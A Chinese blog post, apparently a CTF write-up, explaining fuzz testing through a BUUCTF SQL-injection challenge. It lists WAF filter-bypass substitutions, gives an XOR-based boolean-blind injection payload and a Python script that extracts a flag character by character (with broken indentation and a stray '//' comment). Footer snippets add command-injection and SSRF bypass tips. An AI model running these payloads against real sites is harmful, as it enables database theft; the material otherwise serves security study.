FUZZ题目讲解

最新推荐文章于 2024-01-03 17:48:21 发布
最新推荐文章于 2024-01-03 17:48:21 发布
阅读量2.9k 收藏 8
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/116240448
版权

FUZZ讲解

文章目录

前言

何为Fuzz简单来说就是模糊测试

模糊测试(fuzz testing)是一种介于完全的手工渗透测试与完全的自动化测试之间的安全性测试类型
就是一遍一遍的去尝试

使用方法

拿buuctf 一道注入题来说
[CISCN2019 华北赛区 Day2 Web1]Hack World
输入1,2,3
分别有不同显示内容分别是

  • Hello, glzjin wants a girlfriend
  • Do you want to be my girlfriend?
  • Error Occured When Fetch Result.

这里没有回显也没有报错信息 之后返回的不同字符用bool注入来做

先手动Fuzz一波 直接输入1or 1and 等等 来测试这些字符有没有过滤
发现都是 : SQL Injection Checked.
看来过滤了不少东西

总体来说就是先手工测试几个符号,大概看看有哪个被过滤掉了,然后在fuzz测试时,只要和你刚才测试的,length一样长的,就都是被过滤的。

上bp用intruder模块来爆破 看返回的长度
第一步
在这里插入图片描述
第二步
在这里插入图片描述
第三步 option 设为默认即可
最后 点击start attack 开始爆破

可以看到过滤了好多东西 在这里插入图片描述
还有 不同的respond 对应不同的返回长度

补充知识点

Bool注入基本基本流程是以字符注入为例

1'and if(substr(database(),%d,1)=%c,1,0)%(循环的值,循环的字符)#//如果为真 则返回 1 否则为0

在这里插入图片描述

这里先总结一下 过滤时候 代替的字符

  • 空格可以用() 来代替 还有/**/

  • 单引号 可以用16进制来代替

  • substr(str,1,1)可以用substr(str from 1 for 1)来代替

  • if(条件,1,2):意思是如果条件成立返回1否则返回2
    当他过滤时可以用case()when()then()else()end

  • = 可以用 regexp 或like代替

  • ord() 和ascii()互相替换

  • mid()和substr()互相替换

所以可以构造的pyload为

payload="3^if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)"%(i,j)

因为 3^2 = 2 得到这串字符Do you want to be my girlfriend?

构造的代码

整体代码如下

import requests
flag = ''
url='http://e31a6985-b732-45cb-84f7-58fcdb1f7ed4.node3.buuoj.cn/index.php'
for i in range(1, 50):
    for j in range(33,128)://这个范围时可打印的所有字符

        payload="3^if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)"%(i,j)
                data={
            'id':payload
        }
        s=requests.post(url,data=data)
        if 'Do you want to be my girlfriend?' in s.text:
            print(chr(j),end='')

这里我用二分法 不知道为啥没跑出来 所以智能用常规的来解

Rgylin
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“百度杯”CTF比赛 十一月场Fuzz
wjd19980925的博客
04-12 2840
“百度杯”CTF比赛 十一月场Fuzz i春秋
fuzz字典大全。多形式fuzz
07-29
fuzz大全,有多个fuzz字典,强无敌
FUZZ爆破字典.rar
08-03
FUZZ爆破字典
fuzz.rar(模糊测试工具)
03-03
Fuzz是世界上第一款Fuzzing工具,也是该技术称之为‘fuzzing’的原因,它是威斯康星大学研究所测试windows程序的工具。该工具利用windows的消息机制向窗口随机的发送数据,试图使得应用程序崩溃。
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5084
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
fuzz视角看CTF堆题--qwb2023_chatting
最新发布
azraelxuemo的博客
01-03 1072
注意异常处理部分注意每一个流程完整的生命周期,防止当前流程触发的异常实际是上一个操作的不要随意忽视看起来没有效果的操作,除非能保证去除那些操作之后不影响fuzz的结果,或者说除非我们从代码层面能够保证实际是没有效果的。
初探AFL-Fuzz
子曰小玖的博客
09-27 6017
AFL-Fuzz介绍 Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 AFL则是fuzzing的一个很好用的工具,全称是American Fuzzy Lop,由Google安全工程师Michał Zalewski开发的一款开源fuzzing测试工具,可以高效地对二进制程序进行fuzzing,挖掘可能存在的内存安全漏洞,如栈溢出、堆溢出、U
FUZZ入门1
weixin_61283545的博客
05-27 2611
AFL-Fuzz介绍 Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 AFL则是fuzzing的一个很好用的工具,全称是American Fuzzy Lop,由Google安全工程师Michał Zalewski开发的一款开源fuzzing测试工具,可以高效地对二进制程序进行fuzzing,挖掘可能存在的内存安全漏洞,如栈溢出、堆溢出、U
CTF fuzz 文件包含 php伪协议
baynk的博客
03-22 1194
一开始就需要fuzz。 先随意构造两个参数,丢到burpsuite中,构造两个是因为跑得快些。。。 这里模式记得换下,用Pitchfork,fuzz的地方也不要用错了。 第一个payload值。 第二个payload值 gogogo等结果吧。 路径应该是path了。。。 确实是OK的,那这里用php伪协议来找文件路径了。 本来想用php://input读目录文件的,但是好像有点问题,所...
fuzz技术.png
02-16
软件模糊测试思维导图
fuzz字典大全fuzz字典大全
12-17
fuzz
fuzz基础教程.txt
12-17
fuzz fuzz基础教程.txt
开发者测试笔记01--Fuzz技术总结
zhouyuming_hbxt的博客
12-16 462
参考文献 https://blog.csdn.net/weixin_39448417/article/details/99703723
软件测试--基础知识2--开发模型、测试模型
ANingL的博客
09-08 720
文章目录一、开发模型1、瀑布模型1、概念2、测试的切入点3、优缺点1)优点2)缺点3)改良2、快速原型模型1)描述2)优缺点i、优点ii、缺点3、螺旋模型1)描述2)优缺点i、优点ii、缺点 一、开发模型 1、瀑布模型 1、概念 是线性模型的一种,在所有模型中占有重要地位,是所有其他模型的基础 每一个阶段执行依次,按线性顺序进行软件开发 2、测试的切入点 测试阶段处于软件实现后,必须在代码完成后流出足够的时间给测试活动,否则将导致测试不充分,很多问题到项目后期才暴露 3、优缺点 1)优点 开发的各个
2022 DSCTF首届数字空间安全攻防大赛
qq_53263789的博客
07-17 873
2022-DSCTF-web
UNCTF2020 wp
l11III1111的博客
11-15 1759
WEB easy_ssrf 进到页面显示源代码,过滤了一些协议。可以用取反绕过伪协议的限制。 #构造paylaod echo urlencode(~('file:///')).'unctf.com/../../../../../../flag'; #%99%96%93%9A%C5%D0%D0%D0unctf.com/../../../../../../flag easyunserialize __wakeup()函数里判断password是否等于easy,是的话输出flag。 但是password我
2021-8-10ctf的Hack World 1(sql异或布尔盲注入,fuzz测试waf词语方法,通常做ctfsql题目的思路)
qq_45290991的博客
08-10 671
今天这道题算是一个总结吧,其实不难,就是很多细节没有办法想到所以导致出了很多问题。最近也一些关于ctf的sql注入的简单题目,我总结了一下经验,主要从审题、确定注入类型(难点),构造绕过waf的payload几个方面进行讲解。 一、审题 这道题我审题就没做好,为何这么说呢? 首先,题目的意思是在flag表中查询flag列即可: 但是用脚指头想都知道不可能这么简单呀!这是一个post数据的网页,然后就按照常规思路来吧: 我输入1,2,返回了正常的问候“找女友屌丝系列”: 接着我就用了常
CTF综合靶机渗透
xv66666的博客
08-11 1025
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
漏洞挖掘 | 简单高效的模糊测试Fuzzing
Kni9hT's Blog
03-31 3319
文章目录定义用途技术详细说明流程图1.大量的测试用例2.对测试用例做过滤3.要用正确的方法4.花90%时间阅读文档5.Fuzzing工具 摘要:Fuzzing是一种通过构造输入来发现软件中的漏洞的一个简单高效的模糊测试方法。 前言:打CTF的时候就听说过几次fuzzing方法,大概知道是一种检测漏洞的方法,一直没了解过,今天抽个时间学习了一下。 定义 Fuzzing方法是指通过构造测试输入...
scapy fuzz
09-28
Scapy是一个功能强大的Python库,用于在网络层和传输层上创建、发送和接收网络数据包。其中fuzz()函数是Scapy库中的一个重要函数,用于生成具有不同变体的数据包,以便测试网络设备和应用程序的鲁棒性和安全性。 使用fuzz()函数,您可以对数据包的各个字段进行模糊测试,例如IP地址、端口号、协议类型等。它会自动创建多个变体的数据包,并将它们发送到目标主机,以验证是否存在任何漏洞或异常行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值